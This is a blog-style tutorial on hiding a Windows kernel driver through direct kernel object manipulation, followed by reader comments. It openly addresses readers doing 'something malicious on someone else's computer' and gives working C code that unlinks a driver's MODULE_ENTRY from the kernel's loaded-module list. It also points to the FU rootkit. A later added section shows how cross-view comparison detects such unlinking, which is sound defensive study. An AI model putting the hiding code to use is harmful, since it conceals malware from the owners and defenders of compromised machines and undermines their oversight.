If you are already doing something malicious on someone else's computer, you may as well hide your precious driver. It is not hard at all: if you have already hidden processes with DKOM (Direct Kernel Object Manipulation), this is going to look familiar, because we are again going to change the FLINK and BLINK pointers of the entry's neighbours.
We are going to use this undocumented structure:
typedef struct _MODULE_ENTRY {
    LIST_ENTRY module_list_entry;   /* links this entry into the loaded-module list */
    DWORD unknown1[4];
    DWORD base;                     /* image base of the driver */
    DWORD driver_start;
    DWORD unknown2;
    UNICODE_STRING driver_Path;
    UNICODE_STRING driver_Name;
} MODULE_ENTRY, *PMODULE_ENTRY;
The MODULE_ENTRY structure above is what the kernel uses to keep track of the drivers in memory. Notice that its first member is a LIST_ENTRY.
We are going to modify the Flink/Blink pointers of that entry's neighbours so that our driver disappears from the linked list. The following code does that.
PMODULE_ENTRY pm_current;

/* DriverObject->DriverSection (offset 0x14 on 32-bit) points at our MODULE_ENTRY */
pm_current = *((PMODULE_ENTRY*)((DWORD)DriverObject + 0x14));

/* previous entry now points forward past us ... */
pm_current->module_list_entry.Blink->Flink = pm_current->module_list_entry.Flink;
/* ... and the next entry points backward past us */
pm_current->module_list_entry.Flink->Blink = pm_current->module_list_entry.Blink;
We changed the Flink pointer of the previous driver and the Blink pointer of the next driver so that both point past our entry; the entry itself is left in memory untouched.
We hid our driver, but the same method can be used to hide other drivers as well. The FU rootkit is a good example of doing so. You can download it from here
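The flip side for a defender is that an unlinked entry is still in memory, so a list walk and any list-independent view of loaded modules disagree. Below is an added example (not code from the original post) that mirrors the page's LIST_ENTRY/MODULE_ENTRY layout in user-mode C, performs the unlink described above on a constructed sample, and then runs the cross-view comparison a rootkit detector uses; the "second view" table is a hypothetical stand-in for a pool scan or driver-object enumeration.

```c
/* User-mode mirror of the kernel layout the page describes (constructed for illustration). */
typedef struct _LIST_ENTRY { struct _LIST_ENTRY *Flink, *Blink; } LIST_ENTRY;
typedef struct _MODULE_ENTRY {
    LIST_ENTRY module_list_entry;   /* first member, as in the page's struct, so a cast recovers the record */
    unsigned long base;             /* image base: the key the two views are compared on */
    const char *driver_Name;
} MODULE_ENTRY;

#define NMOD 3
/* Constructed sample: the same modules as seen by a second, list-independent source (hypothetical). */
static MODULE_ENTRY modules[NMOD] = {
    { {0, 0}, 0x80400000UL, "kernel-like.sys" },
    { {0, 0}, 0xF8A00000UL, "hideme.sys" },
    { {0, 0}, 0xF8B00000UL, "third.sys" },
};
static LIST_ENTRY list_head;

/* Link every table entry into the circular list, mimicking the kernel's module list. */
void build_sample_list(void) {
    list_head.Flink = list_head.Blink = &list_head;
    for (int i = 0; i < NMOD; i++) {
        LIST_ENTRY *e = &modules[i].module_list_entry;
        e->Flink = &list_head;  e->Blink = list_head.Blink;
        list_head.Blink->Flink = e;  list_head.Blink = e;
    }
}

/* The page's unlink: the neighbours are re-pointed past the entry, which is left intact. */
void dkom_unlink(MODULE_ENTRY *m) {
    m->module_list_entry.Blink->Flink = m->module_list_entry.Flink;
    m->module_list_entry.Flink->Blink = m->module_list_entry.Blink;
}
/* View 1: what a walk of the list (the kernel's own enumeration) reports. */
int count_list_walk(void) {
    int n = 0;
    for (LIST_ENTRY *e = list_head.Flink; e != &list_head; e = e->Flink) n++;
    return n;
}
/* Cross-view diff: a base present in the table but absent from the walk is a hidden module. */
int find_hidden(unsigned long *out, int max) {
    int found = 0;
    for (int i = 0; i < NMOD; i++) {
        int seen = 0;
        for (LIST_ENTRY *e = list_head.Flink; e != &list_head; e = e->Flink)
            if (((MODULE_ENTRY *)e)->base == modules[i].base) seen = 1;
        if (!seen && found < max) out[found++] = modules[i].base;
    }
    return found;
}
```

Tools such as IceSword or the detectors described in the Rootkits book apply exactly this diff between enumeration paths, which is why a clean unlink alone does not keep a driver hidden from them.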
For the source code of this article, click here.
P.S. The image is from the book Rootkits: Subverting the Windows Kernel.

August 28, 2007 at 8:52 am
Can we still attach to those hidden processes?
Attach to the process and use writeprocess/readprocess on it, similar to IceSword? Thanks.
Good that I found your site; you have a lot of things here that I'm looking for.
Hope we can have constant communication. Thanks.